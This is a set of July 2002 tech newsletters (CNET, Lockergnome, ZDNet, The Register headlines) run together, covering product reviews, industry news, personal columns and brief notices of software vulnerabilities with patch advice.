   downloading music. It uses the Gnutella client, but in CNET's
   tests, it had an abysmal success rate at actually returning
   files.3
Jaguar:
  Who ever heard of an operating system release being
   early? Well, Apple is managing to pull off the impossible; it
   intends to ship an update to OS X in August, instead of the
   anticipated late fall time frame.   4
Warcraft III:
Ah, summer: the perfect time to stay inside and
   sit in front of your computer. Warcraft III has just been
   released--right in time for the good weather. GameSpot calls
   it one the finest games ever made, but if that doesn't do it
   for you, there's another fighting game on deck (see No. 5).5
America's Army: As Senior Editor Darren Gladstone pointed out in a recent column, the Army wants you to play PC games.
   That's right: the United States Army spent $6.3 million
   developing its own title, and it has just launched a television
   campaign to drum up interest. Apparently, the campaign is
   working, since CNET users made America's Army a top search
   term last week.
	For more Buzz, click here.
Live tech help: submit your question now
CNET News.com: Top CIOs on the future of IT
Find a job you love with more than 1 million postings
Editors' Choice Award: Pioneer's HTS-910DV
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</si>
  <si>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 xml:space="preserve">
Internet Services Weekly Newsletter
Reseller Accounts1.Â InfinologyÂ Corp., $592.Â ReadyHosting.com, $4.123.Â Aplus.Net, $79.954.Â OneÂ WorldÂ Hosting, $105.Â SuperbÂ Internet, $5More providers
Live tech help now
May's Editors' Choice
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoft 
July 11, 2002
--Lindsey Turrentine
Senior editor
CNET Software and Internet
 Dear Readers,Your ISP, if it's anything like mine, works like a very large
boat: It moves slowly, it turns slowly, and sometimes it leaks.
Take rogue wireless networks, for example. For many months now,
some mischievous entrepreneurs have been hacking into major ISP
networks and siphoning off bandwidth for neighborhood wireless
networks. Only now, months later, are broadband bigwigs doing
something about it. And what
about ISP hackers? Could they break into your service provider?
Probably. Thankfully, you can protect yourself against most of
these leaks. Let Dan Tynan, our ISP guru, show you how. Quick links to Services &amp; Prices from these companies
5-megapixel shoot-outNot all high-res cameras were created alike. We put four to the test to find out what sets each apart.
	â€¢ Cameras coming soon
	â€¢ Point-and-shoot picksMost popular
Desktops
	1. Dell Dimension 4400
	2. Sony VAIO PCV-RX650
	3. Dell Dimension 4400 for Home
	4. Dell Dimension 8200
	5. Dell Optiplex GX240
 See all most popular
This week in Internet ServicesBig broadband providers are ticked off about Wi-Fi hot spots.
In fact, both AT&amp;T Broadband and Time Warner Cable have begun
campaigns to stop subscribers from sharing their accounts with
others at no charge. Also this week: we review Yahoo"s new
dial-up service.
Is your ISP safe from hackers?Surely, the folks who run your ISP have thought good and hard
about security issues, but should you count on their skills to
ward off intruders? Not wise, says our ISP expert. In this
week"s column, Dan Tynan takes security matters into his own
hands and shows you how to protect yourself.Domain namesA domain name provides an online identity and contact point for
your business, organization, or project. Almost every transaction
on the Internet relies upon a domain name to conduct commerce,
display Web pages, deliver e-mail, and more. Secure your own
domain here.Comcast shareholders bless AT&amp;T dealComcast shareholders on Wednesday approved the cable television
company's $27 billion purchase of larger rival AT&amp;T Broadband,
which will create the nation's largest cable TV operator with
more than 22 million customers.
U.S. Attorney investigates Qwest 
Qwest Communications International, the number-four U.S. local
telephone carrier, said Wednesday that the U.S. Attorney's office
in Denver has begun a criminal investigation of the company.Antivirus guide 2002You want to protect your PC, of course. But how? We"ll walk you
through some of your best antivirus options. Our reviewers
looked at 10 top antivirus products and sorted out the features
and levels of protection found in each.
Tech Trends
Hardware
Software
Shopping
Downloads
News
Investing
Electronics
Web Building
Help &amp; How-Tos
Internet
Games
Message Boards
CNET Radio
Music Center 
Search  
 Internet Services
	All CNET
	The Web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</si>
  <si>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20020710 Lockergnome Digital Media
Â 07.10.2002 MediaREPORT
A BOOK FOR EVERY GEEK: Want to know more about 
networking? 
Have you ever wanted to 
write an e-book? Maybe you need to polish 
your 
Web design skills? Get full-length books from the Poor Richard's 
series, including Poor Richard's E-mail Publishing, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. 
Click here to learn more.    I'm now twice a published author. Earlier in the week, I released my  
top 50 Mac OS X tips, 
which marks the only thing I've ever written that I 
expect anyone to pay for. If you happen to use OS X, go check them out. 
My second publication is a PDF only explanation of the process for 
converting Vinyl LPs to CD, by way of your PC (how's that for alphabet 
soup). For the time being, you can get it absolutely free, with the 
caveat that I'd appreciate some feed back on what could be added to make 
it more useful (I'm considering some screen shots for it if I get some 
time). What are you waiting for -- 
get something free already.With the expiration of Lockergnome's old cell phone plan, Lori and I 
opted to make a switch to Verizon, at the recommendation of Brian 
Stevens. I'm already happy with the suggestion, as our previous provider 
had horrid customer service, not to mention I now have a much geekier 
phone in the form of the 
Kyocera QCP 6035 
Palm powered unit. It's just 
larger than most Palm devices on the market, but having the device 
integration is nice. It has all the functionality of a Palm, with some 
Internet browsing capabilities and of course, phone access. A built in 
speakerphone actually works better than I expected,  Now all I need to 
do is get more applications installed.Of interest to anyone who signed up for 
emusic after Chris and I talked 
the service up and down last week: It seems they've added in the ballpark 
of 1,000 Universal titles to their roster of offerings. Not surprising 
considering they're part of the same conglomerate, but still good news 
in terms of feature expansion.Jake LudingtonÂ Â Â Â Â Â Â Â Â GnomePRODUCER
GIF Movie Gear v3.02 [1129k] W9X/NT/W2K/XP $40
http://www.moviegear.com/gmgdet.htm
The majority of GIF animation on the Web does absolutely nothing for 
me. I'm of the mindset that animation is meant to either tell a story 
or illustrate a concept -- not put something in motion just because 
you can. That said, for anyone wanting to create animations, this tool 
makes it nice and easy. A storyboard interface keeps you thinking like 
a movie maker as you build your animated creations, which lends itself 
to helping anyone who'd like to get from point A to point B in an 
orderly fashion. The software supports PSD, JPG, AVI, BMP, and GIF 
formats, leaving your options open for creating animated segments.Â GnomeFEATURE
Madshrimps Extreme CDROM Testing
http://www.madshrimps.com/index-e.php?action=webnews-e&amp;l1=0&amp;l2=30
A little on the childish side, but this CD-Rom drive test is still very funny. 
Watch as this group rewrites the rules on drive benchmarking. If geek TV were 
more like this, even non-geeks would tune in to watch (which probably says 
more than it should about the lowest common denominator). A WMV capable player 
is required,.
 Â GnomeSKIN
Modular Orbb XP for S2 Remotes by TravelianPosted on  7/11/02 2:17PM  -- Â Â  
[Download]Â --Â [Zoom]
Â --Â [Visit DeskMod]Â GnomeAUDIO
Liquid Tension Experiment
Unearthed by Jeff Orr
http://www.yesiknow.com/lte/
Fans of fusion guitar heroes, like Joe Satriani and Steve Vai, are going to 
dig this collection of talented players. Formed from the ashes of now 
defunct Dream Theater, the current line up is inhabited by some of the most talented 
"school of music" players currently laboring in the rock genre, this is as 
highbrow as rock gets. Challenging song structures and interesting time 
changes will keep your mind stimulated while your ears are tuning in."
Now You Can Get Chris Pirillo In Your Mailbox, Too! 
Computer Power User magazine is for people who know 
that technology rocks. Itï¿½s for people who enjoy wireless gadgets and 
fast Internet connections.  For people 
who like refreshing commentary from world class computing experts and 
honest reviews.  Does that sound like you? 
Get your 2 FREE TRIAL issues now!
Â GnomePLUGIN
Wallpampered v2.0 [28k] W9X/NT/W2K/XP $5
For Photoshop
http://photoshopplugins.tripod.com/wallpampered.htmSet your wallpaper directly from Photoshop. No need to save your work, 
no need to leave your work area. If you've just edited the picture you 
dreamed of using as your next wallpaper, this plug-in makes it a snap 
to get that desktop re-imaged in a matter of clicks. Choose between 
tiling, centering, or stretching the image to fit the space, with an 
option for modifying the background color as well. The product is 
shareware, but you are on your honor to register, as there is no 
expiration or nagging from the software.
Â GnomeDVD
Click for DetailsTapeheads (R) 1988
Comedy - 93min
Reviewer's Tilt (2)
Two out of work rent-a-cops make an attempt to break into the music 
video industry in this quirky comedy. John Cusack and Tim Robbins 
make this comedy work, starring as the two security guards as they 
send up all sorts of Hollywood stereotypes. You can't help but laugh 
at the ridiculous predicaments these two survive, as they are 
greeted with cameos by a who's who of music and movie industry names. 
I'm sure neither Robbins nor Cusack would openly list this movie on a 
resume, but it is indeed a brilliant performance by both of them, 
especially as a demonstration of their ability to play off of each 
other. Although this is a late 80's release (one of the few 80's 
underground classics I hadn't previously seen), it remains relevant 
to those out there who are looking to put it to the man. If you've 
ever hated the recording industry and its in-crowd attitude, you'll 
love this film. A closing reference to Rene's Courtyard Cafe in Santa 
Monica, which is a regular stop for me every time I'm in the LA area, 
prompted me to want to watch the film for a second viewing. The movie 
is humorous enough for several viewings. Nothing really grabs attention 
on the DVD, but then again, the studio probably expects no one will buy 
it anyway.
Region 1 Encoding (US and Canada only)
Color, Closed Captioned, Widescreen
Sound: Dolby Digital 5.1 (English)
Audio Commentary - Bill Fishman - Director, Michael Nesmith - Executive Producer, Catherine Hardwicke - Production Designer
Â GnomeWALLPAPER
A N N I H I L A T I O N for Abstract by preludePosted on  7/11/02 2:15PM  -- Â Â  
[Download]Â --Â [Zoom]
Â --Â [Visit DeskMod]
http://www.lockergnome.com/issues/digitalmedia/20020710.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.
LOCKERGNOME
Â Geekathon 2002Â Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin Shell
Â Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio ShowÂ The GnomeSHOPPERÂ Microsoft Office Tips
Â PC Productivity Tips
Â Cool Internet Tips
Â Windows 2000 Tips
Â Windows XP Tips
Â Top 50 Fun Sites
Â Must-Know Tech Terms
Â Top 50 Useful Sites
Â Top 75 Tech Sites
Â Top 50 PenguinCORE
Â Top 50 PenguinTWEAKS
Â Recommend Us!
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The Webcams
Â Computer Power UserÂ Submit Your Opinion
Â Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Get Chris's BookÂ General Feedback
Â E-mail the Editor
Â Jake's BlogÂ Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To LockergnomeCLICK HERE TO ZOOMÂ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GNOMEMUSICNickelback's Too Hot For CanadaNickelback fans and Camrose Canada may be seeing a special low tech version of the NMC eCharters' Kiss-style stage...
Madonna Plays Bond's FoilYes, music fans, it has been confirmed. Madonna will show up in the next Bond movie, Die Another Day. Reports say...
Dixie Chicks- DMB CMT Show CancelledThe much-ballyhooed paring of the Dixie Chicks and the Dave Matthews Band may never see the light of day. Here's...
Weezer Singer Goes to Crazy TownWeezer Singer Goes to Crazy Town Weezer front man Rivers Cuomo has lent his fingers to a track off Crazy Town's...
The Boss Will BarnstormBruce Springsteen and the E Street Band are hitting the road to support their new album The Rising and it will be a...
Not Much Sympathy for MichaelThe King of Pop's claim that Sony Music is racist and has treated him badly isn't getting him much support in the... Â 
GNOMECREDITSÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
Â Â Search Past Issues:
Â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</si>
  <si>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MS talks to self about not talking about home 802.11b range
    Doesn't actually announce something we all knew very little about already
        http://www.theregister.co.uk/content/4/26152.html    PGP Outlook plugin has major security hole
    Relax, there's a patch
        http://www.theregister.co.uk/content/4/26145.html    MS SQL Server multiple vulns
    Get your daily fixes
        http://www.theregister.co.uk/content/4/26144.html    MS licensing deadline doom looms - buy or die
    Or defect...
        http://www.theregister.co.uk/content/4/26141.html    Software in China, India to top $27bn by 2006
    And China to pass India, says Gartner
        http://www.theregister.co.uk/content/4/26135.htmlPersonal Hardware    Fox recommends hacked DVD players for The Simpsons
    Cartoon cuffs for Homer?
        http://www.theregister.co.uk/content/54/26139.htmlInternet    Soap and WSDL 'must haves' for web services - IDC
    By the end of this year, already...
        http://www.theregister.co.uk/content/6/26138.html    W3C releases first drafts of WSDL 1.2
    Open for comment and review
        http://www.theregister.co.uk/content/6/26137.htmlNet Security    IE scripting flaw uncovered
    Full disclosure
        http://www.theregister.co.uk/content/55/26147.html    PGP Outlook plugin has major security hole
    Relax, there's a patch
        http://www.theregister.co.uk/content/55/26145.html    MS SQL Server multiple vulns
    Get your daily fixes
        http://www.theregister.co.uk/content/55/26144.html    Attack of the Cyber-Terror Studies
    No pass mark for Dartmouth College
        http://www.theregister.co.uk/content/55/26143.htmlBusiness    Liberty move on Telewest faces legal challenge
    Bondholders baulking...
        http://www.theregister.co.uk/content/7/26136.htmlBroadband    Wales gets broadband boost
    Let's all move to Llandegwning
        http://www.theregister.co.uk/content/22/26146.htmle-business    Yahoo! Back! In! The! Black! 
    Reasons to be cheerful
        http://www.theregister.co.uk/content/23/26140.htmlThe Vulture Central Mailbag    Open source developers wary of MS graphics patent grab
    OpenGL mail
        http://www.theregister.co.uk/content/35/26156.html    Fighting the Pigopolists with bricks not bluster
    Letters Routing around the RIAA
        http://www.theregister.co.uk/content/35/26154.htmlBootnotes    Welsh Assembly Web site sick
    Sorry to hear that
        http://www.theregister.co.uk/content/28/26153.html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</si>
  <si>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
ZDNet AnchorDesk Daily NewsletterVeritas CEO Gary Bloom speaks out at Tech Update. 
Check out these personal laser printer picks at ZDNet Reviews. 
See how WAP works and how you should use it at Builder.com. 
Need a new job? Find one today in ZDNet's Career Center. 
CIOs talk out about the future of IT at CNET News.com. FRI JUL 12, 2002Â David CourseyNew Sony Vaio: When small becomes TOO small
                Sometimes hardware vendors take this whole smaller-is-better thing way, way too far. Witness the Sony Vaio U1. This tiny PC--so far for sale only in Asia--is too small for a jumbo-sized Texan like me to use. But, dang, it's cute!
NOTE: Why we're changing our publishing schedule 
PLUS: AnchorDesk Radio: The changing geography of the Net New security holes found in Outlook, IE... MS networks your home 
Toshiba's new Pocket PC: Beautiful inside and out
3 tools for viewing any file format under the sun  Crucial Clicks: More from ZDNet           CD-RW drives    Flashy, fast FireWire CD-RW drives Need to rip some audio while you're on the road? Gotta back up a PC or a Mac? ZDNet reviewers say: Check out these speedy, portable CD burners.  Read reviews      Most Popular Products    Removable Storage 1. IBM Deskstar 120GXP 2. HP DVD-Writer DVD100i 3. Lite-On 40X/12X/48X EIDE 4. Pioneer DVR-A04 5. Western Digital Caviar WD1200JB More popular storage products             Â SYLVIA CARRÂ New security holes found in Outlook, IE... MS networks your homeSecurity experts have discovered two new vulnerabilities in Internet Explorer and Outlook that leave your system open to hack attacks. Plus: MS will soon help you technify your whole house with easy-to-use home-networking gear. Â JOHN MORRIS AND JOSH TAYLORÂ 
Toshiba's new Pocket PC: Beautiful inside and out
                Beauty is only skin deep, which is why it's so important that Toshiba revamped both  body and soul in its Pocket PC e740. Josh and John tell you how the PDA's improved. Plus: The latest reviews on ZDNet.
Â PRESTON GRALLAÂ 
3 tools for viewing any file format under the sun
                Got a lot of obscure file formats on your PC? Unimpressed with Windows Explorer's ability to view them all? Preston's got three downloads that let you see the contents of just about any file--even the ones you've never heard of.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</si>
  <si>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
Buyer's Alert | July 12, 2002When ordering, make sure the reseller/manufacturer 
provides the rebate coupon you need.Expires July 5, 2002
$50 off Cidco Mailstation with subscriptionExpires July 31, 2002
Get a car cassette adapter and power adapter FREE with Rio Volt SP250Expires August 31, 2002
$20 off SideWinder Strategic CommanderExpires September 30, 2002
$20 off Rio 600 64MB
$20 off Nike PSA (120)
$20 off RioVolt SP90
Expires March 3, 2003
$10 off Microsoft Natural Keyboard Pro PS2/USB NotebooksÂ Â 
1.Gateway 600XL
Â 2.Dell Inspiron 2600 series3.Dell SmartStep 100N4.Toshiba Satellite 5105-S6075.Toshiba Satellite 2400-S251More Top 
            Selling Products...Â 
Dear Reader,
Hard-drive-based MP3 players, which allow you to store massive 
amounts of MP3s and other files on a portable device, have been 
around for a few years. But recently, three new players have 
taken the concept to a new high with impressive advancements 
in design, functionality, and interface. Each has its unique 
strong points, but they're all groundbreaking in their own way. 
Check out our hands-on reviews.Apple iPod (10GB)
Lowest price: $479Creative Labs Nomad Jukebox 3
Lowest price: $345SONICblue Rio Riot
Lowest price: $277
Â 
Â Â iRiver SlimX iMP-350This is the thinnest MP3 CD player we've seen, and its antiskip protection and extra features make it a pleasure to use.Read Review | Check Prices Â Â Â Adobe Photoshop 7.0If you're an advanced photographer and don't have Photoshop yet or if you need natural paint tools, version 7.0 is a must-have; otherwise, version 6.0 will do the trick.
Read Review | Check Prices
Â 
Get Double Memory FREE, Plus Big Savings on Select Systems!Buy select Dellâ„¢ systems and get Double Memory FREE! PLUS save up to $400! Offer ends soon. Small business only. Click for details.
Â 
Â 
Please note 
            that prices fluctuate and may have changed since the sending of this 
            newsletter. Lowest prices listed are usually after rebates (but 
            please check with the reseller, sometimes the rebate is included in 
            their price). 
Compaq iPaq H3635Price recently dropped 11%			Lowest price: $550
Audiovox DV1680 DVDPrice recently dropped 20%			Lowest price: $399
Creative Labs Nomad Jukebox 6GBPrice recently dropped 10%			Lowest price: $149 
SPECIAL FEATUREDid you know that CNET ChannelOnline enables your sales team to 
view pricing and product availability in real time?ChannelOnline's Quote &amp; Procure displays up-to-the-minute pricing 
and availability from multiple distributors - so you can get your
customers what they need, when they need it.You'll be able to:
View data from your select distributors
Compare negotiated pricing for all your distributors
Determine which SKUs are available at your suppliers' warehousesTell me more about Quote &amp; ProcureElsewhere on ZDNetVeritas CEO Gary Bloom speaks out at Tech Update.Check out these personal laser printer picks at ZDNet Reviews.See how WAP works and how you should use it at Builder.com.Need a new job? Find one today in ZDNet's Career Center.CIOs talk out about the future of IT at CNET News.com.
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |
Â Change e-mail formatÂ |
Â Change e-mail addressÂ |
Â FAQÂ |
Â AdvertiseHome |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers
        Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a registered service mark of CNET Networks, Inc.          
</t>
  </si>
  <si>
    <t xml:space="preserve">Tech Update Today
VITAL SIGNS FOR JULY 12, 2002David Berlind
What you need for iPaq wireless connectivity
A public health organization has several iPaqs on order, but
now they want to add WAN connectivity to those PDAs. What
exactly do they need to do? I'm so glad they asked. Here's everything you need to knowLatest from ZDNet News
Security holds back Web services
China: Bursting with brainpower
Micron cranks handle on next-gen memory
Japan chipmakers team on 'SoCs' chip
HP tech exec jumps ship to EMC
Holes put Linux handheld at risk
Microsoft bids to be creme de la CRMMore Enterprise News
Farber's PicksDanFarberDesperately seeking chief ethics officer
Greedy CEOs are making a bad name for the profession--and corporate America. The title chief executive officer now
conjures up an image of someone with questionable ethics, a
greedy disposition, and a disregard for shareholders. If
government-proposed remedies can"t adequately address this
ethics crisis, disgruntled shareholders surely will.
Read my full commentaryOracle challenges Microsoft anewOracle is taking on Microsoft's Exchange with a Collaboration Suite that includes e-mail, calendar and messaging software. Oracle has pitched its products as Microsoft replacements before -- with spectacularly little success. (At Comdex last November, the database giant offered its 9i and app-server software as a more secure alternative to Exchange.) What's different this time? Oracle is selling a separate collaboration product that, says CEO Larry Ellison, is cheaper than rival offerings. Plus: Companies facing a deadline to join Redmond's new licensing program may be more open to non-Micrososft alternatives.
Read the full storyAlso: Ellison shrugs a No. 2 exec
Standards stalled over royalty disputes
The World Wide Web Consortium is bracing for a vote next week that could decide once and for all how the standards body will handle patented technology that comes with royalties attached. If patented technology is rejected, the vote could mark a major shift in the Internet standards battle. Major intellectual property holders such as Microsoft and IBM have a lot at stake.
Read the full storyMicrosoft's OpenGL claim shakes graphics world
Survey: Execs rethinking IT budgetsGrowing numbers of Fortune 1000 CIOs are re-evaluating their IT budgets and spending plans for coming months, according to a recent survey. Morgan Stanley finds that CIOs' top priorities include security software, application integration and Windows 2000/XP upgrades for the desktop. Integration challenges were slowing the rate of application adoption for 38 percent of those surveyed.Read more survey results
Oh look, a new bug in Outlook and IEA Danish security expert has warned of a security flaw in Microsoft's ActiveX scripting component that allows network attackers to peek at cookies, read files and even run programs on a victim's PC. The expert recommended that users disable ActiveX in IE and Outlook, at least until Microsoft releases a patch.Read the full story
Also: Outlook plug-in opens PCs to hackers
Write me at dan.farber@cnet.com
Back to topAlso on Tech Update Today
COMMENTARYÂ Mixing Unix and WindowsMost enterprises have a mix of Windows and Unix systems. Larry Seltzer explores the options for interoperating those systems.
 Q&amp;AÂ Marcelo Tosatti: The future is Linux
The maintainer of the Linux kernel talks about new opportunities, defends UnitedLinux and tells why copyright laws keep him from entering the U.S.
 PREVIOUSLY ON TECH UPDATE TODAYÂ ROI calculators don't tell the whole TCO story
In response to David Berlind's "Dell's formula for ROI," TCO
consultant Tom Rankin warns that "99 percent of TCO tools do
not look at the 'total' but may look at whatever parameters
suit the vendor to sell their products/services." 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ZDNetVeritas CEO Gary Bloom speaks out at Tech Update.  Check out these personal laser printer picks at ZDNet Reviews.  See how WAP works and how you should use it at Builder.com.  Need a new job? Find one today in ZDNet's Career Center.  CIOs talk out about the future of IT at CNET News.com.
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</si>
  <si>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20020711 Lockergnome Tech Specialist
Â  07.11.2002 GnomeREPORT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Wednesday's trip went fairly smooth overall, and I actually 
enjoyed helping out my friend Larry with some server 
software installation and network configuration tasks. His 
kids seemed impressed with the new ability to copy files 
between the five different computers and have Internet 
access at any of them. Ahh, yes... geeks in the making.After that project was finished, I met up with Jake at a 
nearby Starbucks to shoot the breeze and catch up on all 
things Lockergnome. We email all the time, but it's nice to 
have a face-to-face conversation for a change. He had just 
finished establishing new phone service with Verizon, so he 
has a fun new PalmOS-based phone to play with.After the dose of caffeine, I headed up to Boone, Iowa to 
hook up with my cousin Casey and his wife of two months, 
Stephanie. Their new house is awesome, but disappointing, as 
there was no high-speed Internet connection or wireless 
networking. We'll have to fix that. For now, I'll remain 
impressed with the geothermal heating/cooling system and the 
vast potential of the unfinished basement that will someday 
make an incredible rec room [insert suitable Tim Allen grunt 
here]. Casey is ticked about all of the rain recently because it 
keeps eroding his dirt front yard into the drainage ditch. 
The back yard is in great shape, as there was sod laid after 
construction finished up, but he decided to save a few bucks 
and seed the front himself next spring. This now assumes 
that he'll have a front yard left by then.The rain turned out to be the last event of the evening. 
I drove through the beginning of the storms on the way from 
Ankeny to Boone, and I just knew it was going to be a rough 
drive home later since they were only getting started at 
that time. I was correct. What would normally be an hour and 
45 minute drive turned into nearly two and a half hours and 
many, many animal sightings. As the night wore on, I was 
half expecting to see someone building an ark in a 
cornfield. Must have been where the animals were headed.The rain guage at home showed 3.25" this morning, adding 
to the 1.25" and 2.5" amounts dumped out of it within the 
last week. I considered setting the sprinkler up in the 
front yard today as an attempt at neighborly humor, but 
figured I'd just be labeled as a complete moron instead. So, what did I forget to take with me, you ask? 
Directions to Larry's house. DOH! I had to dig out the 
notebook at a close rest area in a vain attempt to quickly 
memorize the route. Instead, I decided to transcribe the 
list on my Jornada, which would be far easier (and safer) to 
read as I navigated through the streets. There's still a use 
for printers in this world, without question. Reading text 
from the tiny screen bites. Larger print and bold text on a 
sheet of paper is the way to go. At least I didn't leave my 
PDA at home as well, which I actually considered doing.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
Satellite Internet Delays Add Up
http://www.skycasters.com/supervpnwhitepaper.htm
Have you considered moving to a satellite Internet 
provider at some point? While all of the marketing hype 
paints a rosy picture, there are a couple of things that you 
really must consider before writing the check. The birds are 
some 23,000 miles above the surface of the planet, so there 
is a significant delay while the bits float up and back 
down. The absolute minimum time for a packet to get from one 
place to another is nearly a quarter of a second. Add in 
hops across the Internet and other hardware latency and it's 
common to see ping times of between 500 and 1000 
milliseconds - an eternity when you're talking about TCP/IP 
connections. Now consider how VPN connections are affected, 
being that they are generally significantly slower on the 
ground without the extra 46,000 miles. Ouch! This white 
paper is a tad marketing driven, but I think their 
explanation of technology and how they are addressing VPN-
over-satellite connections is quite informative.
Â GnomeSYSTEM
PGP Outlook Plug-in Vulnerability
http://www.nai.com/naicommon/download/upgrade/patches/patch-pgphotfix.asp
Even encryption software is potentially exposed to 
security problems. Network Associates' PGP software, which 
interfaces directly with Microsoft Outlook, has been found 
to be vulnerable to malicious code within an email. Exposed 
systems can be made to execute code of the attacker's 
choice, and because email can be sent from anywhere and to 
anywhere. Tracking down the source could be rather 
difficult. Hotfixes for each of NAI's products are available 
on their website.
Â GnomeALERTZ
Today's Top 5 kbAlertzQ311885 - TAPI Error 0x8000022 Occurs with an English (Canada) or French (Canada) System Locale (Q311885)
Q311842 - Help and Support May Stop Responding When You Use the Network Diagnostic Tool (Q311842)
Q311838 - An OpenGL Program May Cause an Access Violation in Windows XP 64-Bit Edition (Q311838)
Q311542 - Devices May Not Power Up Properly When Resuming From Standby (Q311542)
Q311345 - Long Delay with No Prompt Between the Time When You Click Finish and When the Desktop Loads (Q311345)GET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Recommend It!
Â GnomeASSISTANT
Intro to Relational Databases
http://www.15seconds.com/issue/020522.htm
You know what a database is, right? Sure you do. Can you 
explain what a relational database is all about? Correctly? 
There's a lot more to database management and development 
than dumping a bunch of records into tables and generating 
reports. Proper design is crucial. Trust me. I've been on 
the receiving end of some lazy programming efforts that 
ignore the foundation of relational databases, and it 
usually results in additional work later.
Â GnomeSTUFF
Smile While You Surf
I like creative use of 404 pages, so sue me. Some of you have complained about the one Chris created for display when you come across a bogus link on the Lockergnome web site, which I don't understand. Would you rather stare at that stupid-looking, uninformative and generally useless one that your browser provides by default? Cramsession.com posted some unique "excuses" for their site being down for maintenance, and I thought I'd share a few:Roses are red
Our web site is resting
We're fixing the server
While EverquestingIn the interest of research, we're testing to see how long it takes a Network Administrator to get through a people-size maze to the web servers. As soon as he finds them, we'll be back online... Unless the Marketing Minotaur gets him first.Suicide note found on the web server: "I've had it. I can't take the heat anymore. You ran me ragged, and what thanks did I get? None. Null. Nothing. I gave and I gave, and you still wanted more I spent every second of my day trying to make you happy, but it was never enough. Always work faster, do more, stay late, work overtime, be more efficient. I was never good enough for you anyway. You deserve better. Signed CPU." You have reached the Cramsession Maintenance Page.
While you are staring at this page, waiting for the website to come back up, (should take about an hour or two) We'd like to offer the following fun activities:Hold your breath until you see black spots dancing in front of your eyes.
Spin around in your chair until you get nauseous. Wheee!
Pretend your mouse is a microphone. Dictate a memo into it where you outline your plans for global domination.
Connect the dots!
.Â Â Â .Â Â Â .Â Â Â .Â Â Â .Â Â Â .Â Â Â .Get monitor cleaner so you can wipe ink off of screen from connecting the dots.
We apologise for the inconvenience of our missing web site. We're doing something really "high tech" and "important" behind this "maintenance" curtain. We'll be back just as soon as we catch all the gophers.....Again.HELP! I'm locked in the Server Room. Please send Help! And I'm running out of potato chips, too!Recommend It!http://www.lockergnome.com/issues/techspecialist/20020711.html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</si>
  <si>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20020712 Sausage Sizzler - Lockergnome - Webmaster WeeklyÂ 07.12.2002 WebREPORT
CUT YOUR DESIGN COSTS AND TIME: Get access to 250+ Web Templates 
with CSS at BasicTemplates.com. 
Annual memberships are only $54.95. Individual templates are $5.00 each. 
New templates added weekly. No link back is required, and web designers 
are not charged higher fees to use them on their clients' sites. 
Browse the full gallery!   Somehow, it never got mentioned that Lockergnome has a GnomeTome for all 
you 
Dreamweaver users out there. Dennis Jarrett, a gnomie from the UK 
with a prolific list of writing accomplishments, lent his brain to a list 
of things everyone should know to make using Dreamweaver 4 (and newer) 
easier to use. I 've never actually used version 4, having stuck with 3 
until recently starting the review process of the StudioMX  suite, but 
I've been  able to apply every tip I tried to some aspect of DreamweaverMX, 
so I can only guess those of you using 4 will want to 
check 'em out too.As I mentioned in yesterday's Digital Media newsletter, I recently 
switched cell phones to the 
Kyocera QCP6035. 
The unit is Palm powered, with a screen the size of an m105 and all the 
functionality of Palm OS, in addition to having the latest bells and whistles 
you'd want in a phone. Built in Web browsing, by way of MSN, is slightly 
cumbersome compared to what I'm used to from my cable connection, but I can 
already see the usefulness in carrying around portable access to things like 
driving directions. Now that I've got a way to test the final results in real time, I've got a 
more vested interest in making Lockergnome considerably more WAP compatible. 
I'm still figuring out many of the phone's features, so that's still going to 
be at least  a few weeks away. Without a doubt, I'll be sharing my experiences 
in WAPing Lockergnome in an upcoming series of articles.Jake LudingtonÂ Â Â Â Â Â Â Â Â GnomeMAIL
phpMyNewsletter
http://gregory.kokanosky.free.fr/phpmynewsletter/As a free solution for managing newsletters, for smaller lists, 
this does most of what you need. Subscribers are stored in a 
mySQL database, with the ability to send user confirmation 
e-mails. Initially, the address must still be added manually to 
the database, which isn't idea, but doing this generates a 
confirmation e-mail with a link that users click on if they want 
to be added. The software purges addresses with no response, 
following an administrator defined waiting period. From the php 
interface you can send either text or HTML formatted messages, 
with a built-in preview to make sure your formatting is OK. 
Documentation is somewhat sparse, so prior knowledge of php and 
mySQL are useful in getting this installed.Â GnomeTOOLSOpalisRobot v4.0 [60MB] NT/W2k/XP
http://www.opalis.comThink of this as something like "cron for Windows" only even more powerful. 
OpalisRobot allows you to schedule almost any process on your server, 
adding an additional layer of functionality, like the ability to program 
telephony commands to complete administrative tasks. OpalisRobot 
effectively processes e-mail commands, in addition to telephone DTMF tones, 
making everything on your server administerable from remote locations, 
even when you can't get remote control access of the machine. Programming 
jobs is point-click simple, saving you time even when you schedule tasks 
to save you time. If you operate in a Windows server environment, you're 
adding extra hours to your day and costing your company additional dollars 
by not having this software.Â GnomeSERVER
PNG Files Do Not Show Transparency in Internet Explorer (Q294714)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714"If you browse to a Web page that contains an image that has a transparent 
background in Portable Network Graphics (PNG) format, the image background 
may appear to be gray rather than transparent."Fortunately, Microsoft explains a solution for this problem. Personally, I 
haven't encountered this PNG display error, but for those of you 
simplementing PNGs on your sites, you'll want to review the solution.WEB TEMPLATES WITH CSS: Cut your design costs and time with an 
annual membership from BasicTemplates.com. 
For only $54.95 get access to 250+ Web Templates. 
New templates added weekly.  
Â GnomeUSABILITYhttp://diveintomark.org/Not only is this information great for improving blog accessibility, it 
happens to be equally relevant for *any* site. The 30 days are nearing 
